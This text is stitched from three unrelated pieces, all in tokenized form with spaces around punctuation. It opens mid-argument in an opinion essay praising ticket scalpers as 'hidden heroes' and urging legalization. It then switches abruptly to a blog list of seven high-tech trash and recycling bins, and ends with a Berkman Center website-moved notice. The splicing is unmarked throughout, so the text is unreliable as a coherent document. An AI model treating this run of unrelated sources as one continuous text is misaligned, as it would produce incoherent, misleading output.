If the team does well , the scalper can make a nice profit ; if the team does poorly , he can suffer a huge loss .
This opportunity for profit is good for fans because it ensures that tickets will be made available should the team do unexpectedly well .
It is good for the team because it will be able to presell tickets even for bad seasons .
The more the local law enforcement cracks down on scalpers , the greater the reduction in these positive externalities .
Season - ticket holders are also indebted to scalpers .
Though the season - ticket holders have chosen to absorb the scheduling time risk , they are more comfortable doing so with the expectation that , should something unavoidable arise , they could sell their ticket to a scalper .
Thus the scalper provides a type of scheduling insurance .
The scalper is able to provide liquidity for season - ticket holders .
If the season - ticket holder find himself or herself in a financial tight spot , he or she is able to recoup some or all of his or her ticket cost by selling to a scalper .
These factors can increase the consumer 's willingness to purchase season tickets .
This is a major benefit to the team because season tickets often sell at quite a premium as compared to general admission tickets .
It is difficult to see how prohibition of this act helps anyone ; it certainly does not help the season - ticket holder or the team .
Event goers benefit from the high level of convenience provided by the scalper .
This convenience takes the form of easy accessibility .
Attendees are not forced to plan as much and are able to show up at an event , spur of the moment , and purchase a ticket .
This is a major benefit for those who are unable or unwilling to commit themselves to inflexible plans .
Even local workers and businesses benefit from the scalper 's actions .
People who do not have tickets often travel to the city hosting the game in the hopes of purchasing a ticket from a scalper once there .
If the fan is unable to find a ticket at a price she or he deems reasonable , the chances are very good the individual will still visit local dining establishments and businesses before leaving town .
Thus , restaurant workers get more tips , and businesses have higher sales than they would without the expectation of last - minute ticket availability .
By banning scalping , local governments are effectively stealing this additional income from the community .
Clearly , scalpers provide vast benefits for entire communities .
Unfortunately , the often - illegal nature of their work reduces the benefits to be had .
As with any prohibited good or service , there is always a risk premium associated with its illegal provision .
Buyers are forced to compensate the scalper for undertaking the legal risk associated with providing this harmless service .
The legal risk also creates an artificial barrier to entry .
There are many citizens who would like to share in the profits to be had from ticket resale but who are unwilling to skirt the law .
Thus there are fewer competitors in the market , and those willing to resell are able to earn higher profits .
The prohibited nature of the service also adds to the consumer 's searching costs .
In areas where scalping is prohibited , there exists no reliable location in which those desiring tickets can obtain them .
There can be no ticket store .
Since scalpers cannot open a shop , those desiring tickets must spend time and energy searching the area for clandestine scalpers .
The inability to advertise greatly increases the search cost .
This is why clever scalpers hold up signs stating they need tickets while , at the same time , holding tickets high in the air as a signal of their desire to sell tickets .
They are forced to advertise the opposite of what they are doing .
While those who frequent games quickly learn to decipher this curious signal , many people unsuccessfully search for tickets , ignoring the very people they seek because they do not understand the cryptic message .
Obviously , this headache is unnecessary .
Scalpers are hidden heroes at events .
They take personal , financial , and legal risk in order to provide a critical service in the hopes of earning a profit from their labors .
Many of the aspects of scalping that people decry are , in reality , a direct product of the prohibition placed on the service .
The prohibition raises prices , reduces supply , and limits competition .
In addition , in the absence of the prohibition of scalping , buyers would have legal recourse against unethical scalpers who sell counterfeit tickets .
Scalpers bravely defy ill - conceived laws .
In doing so , they provide a service to the communities in which they operate .
Though it is probably not their intention , they serve as warriors for the free market .
They fight against the notion that people must be protected from free , uncoerced exchanges .
The scalpers are as critical to a successful event as the food vendors , the gatekeepers , and the janitors .
They should be afforded the same legal rights as everyone else .
How high - tech a recycle bins can be ?
How much intelligence a trash can should have ?
There are 7 advance garbage bin designs collect from would … eco-friendly … smell free … auto scan and sort …
I am not sure do we really need those but they are pretty cool designs anyway …
Hope you enjoy .
Sort and Separate – Barcode Recycle Station
link
We should recycle , but do we know how to sort all plastics and metals ?
That is the reason why Barcode Trashcan comes in .
It makes being “ green ” a lot easier .
There ’s one bin for each type of recyclable material .
Just swipe the item in question over the top and the bin that opens is your winner .
Ovetto Recycling Bin
link Taking the idea of recycling to its logical conclusion , Italian architect , designer and art director Gianluca Soldi presented the Ovetto Recycling Bin , a recycled recycling center .
Made from recycled polypropylene ( the same material used in ropes and carpeting ) , the bin offers three separate receptacles to make recycling easier and more organized while taking it a stylish step up from those standard blue bins .
Named after the Italian word for ‘ egg ’ , Ovetto takes on a natural shape and is available in several bright color options .
Appliqué stickers come with each bin for easy identification of the compartments .
Tri3 Trash Can
link Left pedal opens the top can .
This can is for general discarding .
Middle pedal makes the second can rotate around a decentered axe .
This can is for packaging , plastic etc .
Right pedal makes the last can move towards the user .
The last can is for glass discarding .
Click Hybrid Trashcan
link Using the aperture / iris action of a camera as inspiration , Click features a button that allows you to open the mouth of the bin to an appropriate size , so as to dispose the waste .
Small opening for small trash like cans and bottles , big hole for big items !
After disposing , the trashbin will be closed again … so no more smelly … no more fruitfly , I guess .
Minus – freezing trash bin
link
Do n’t trick yourself !
There ’s no cure for smelly food .
This pail right here thinks it is hot stuff .
It ’s called the “ Minus ” and it ’s basically cold hearted .
Open the lid , place the banana peels inside , close , click shut , set temp , and press go .
Coldness .
Do not drop your pop cans in here unless they are all the way empty .
Also probably not a good place for dead animals .
I.master Intelligent Wastebin
link The Wastecan i. Master Wesco is definitely much smarter than your trash can .
It features an invisible infrared sensor at the top that senses when your hand is near , filled with stinky trash , and automatically opens the lid without the need for involvement from you other hand or your foot for that matter .
Trendy eco-friendly Ecomod rubbish bin
link
The brainchild of UK designer Robert Welby , the ergonomically designed bin features an all - in - one container that is specially designed to segregate paper , plastic and aluminum in different compartments without looking too bulky .
The rubbish bin then proceeds to crush your separated waste into a smaller bulk so that you immediately save a lot more space and can dispose of more rubbish .
Tweet
We are sorry for the inconvenience .
We have just moved into our new website .
Please let us know what you were looking for by sending an email to redesign-feedback@cyber.harvard.edu .
Follow these links for the Berkman Center
The tabs along the top of this page will also help you find your way .
And please feel free to contact us with any questions .
